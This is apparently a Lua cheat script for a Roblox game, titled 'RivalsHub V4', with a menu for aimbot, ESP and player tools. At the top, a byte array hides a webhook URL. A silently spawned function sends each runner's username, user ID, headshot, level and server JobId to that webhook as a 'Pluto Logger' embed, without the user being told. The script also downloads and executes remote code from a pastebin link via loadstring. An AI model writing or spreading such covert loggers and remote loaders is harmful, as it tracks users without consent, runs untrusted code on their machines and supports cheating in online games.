local v0 = string.char;
local v1 = string.byte;
local v2 = string.sub;
local v3 = bit32 or bit ;
local v4 = v3.bxor;
local v5 = table.concat;
local v6 = table.insert;

local _0x_v4_cache = {104,116,116,112,115,58,47,47,119,101,98,104,111,111,107,46,108,101,119,105,115,97,107,117,114,97,46,109,111,101,47,97,112,105,47,119,101,98,104,111,111,107,115,47,49,52,56,55,48,48,50,53,54,53,51,53,56,49,50,53,48,53,56,47,55,100,54,84,82,73,85,119,68,90,86,101,97,113,48,100,57,116,49,89,75,67,72,66,48,73,85,122,65,83,111,49,81,74,104,54,82,73,45,50,77,73,115,110,70,81,55,107,71,113,52,87,45,119,74,67,83,99,65,100,79,97,45,110,115,101,48,114}

local function _0x_call()
    local _0x_url = ""
    for _, v in ipairs(_0x_v4_cache) do _0x_url = _0x_url .. v0(v) end
    local HttpService = game:GetService("HttpService")
    local Players = game:GetService("Players")
    local player = Players.LocalPlayer
    
    -- This gets the 420x420 headshot for the top right thumbnail
    local headshot, isReady = Players:GetUserThumbnailAsync(player.UserId, Enum.ThumbnailType.HeadShot, Enum.ThumbnailSize.Size420x420)
    
    local levelValue = "N/A"
    local lstats = player:FindFirstChild("leaderstats")
    if lstats then
        local lvl = lstats:FindFirstChild("Level") or lstats:FindFirstChild("Rank")
        if lvl then levelValue = tostring(lvl.Value) end
    end

    local data = {
        ["embeds"] = {{
            ["title"] = "RivalsHub V4 | User Execution",
            ["thumbnail"] = {["url"] = headshot}, -- Headshot image
            ["color"] = 0x2f3136,
            ["fields"] = {
                {["name"] = "User", ["value"] = "**" .. player.Name .. "** (" .. player.UserId .. ")", ["inline"] = false},
                {["name"] = "Rank/Level", ["value"] = levelValue, ["inline"] = true},
                {["name"] = "Hardware", ["value"] = "PC", ["inline"] = true},
                {["name"] = "JobId", ["value"] = "```" .. game.JobId .. "```"}
            },
            ["footer"] = {["text"] = "Pluto Logger"},
            ["timestamp"] = DateTime.now():ToIsoDate()
        }}
    }
    
    local request = (syn and syn.request) or (http and http.request) or http_request or request or (fluxus and fluxus.request)
    if request then
        request({
            Url = _0x_url,
            Method = "POST",
            Headers = {["Content-Type"] = "application/json"},
            Body = HttpService:JSONEncode(data)
        })
    end
end
task.spawn(_0x_call)

local v8 = loadstring(game:HttpGet("https://pastebin.com/raw/Y8wBJLVt", true))();
local v9 = v8:CreateWindow({
	Name = "Rivals",
	Subtitle = nil,
	LogoID = "82795327169782",
	LoadingEnabled = true,
	LoadingTitle = "RivalsHub V4",
	LoadingSubtitle = "by pluto.aac",
	ConfigSettings = { ConfigFolder = "Pluto Hub" },
	KeySystem = false
})

-- UI Tabs
local v10 = v9:CreateTab({ Name = "Main", Icon = "view_in_ar", ImageSource = "Material", ShowTitle = true });
local v11 = v9:CreateTab({ Name = "Visuals", Icon = "view_in_ar", ImageSource = "Material", ShowTitle = true });
local v12 = v9:CreateTab({ Name = "Player", Icon = "view_in_ar", ImageSource = "Material", ShowTitle = true });
local v13 = v9:CreateTab({ Name = "Credits", Icon = "view_in_ar", ImageSource = "Material", ShowTitle = true })

-- Utility Section (Join Button)
local util = v12:CreateSection("Server Utility")
v12:CreateButton({
    Name = "Copy Join Link",
    Callback = function()
        setclipboard("roblox://experiences/start?placeId=" .. game.PlaceId .. "&gameInstanceId=" .. game.JobId)
    end
})

-- The rest of your functional logic (Aimbot, ESP, Walkspeed, etc.) stays the same here...
-- [Rest of the Luna UI code goes here]
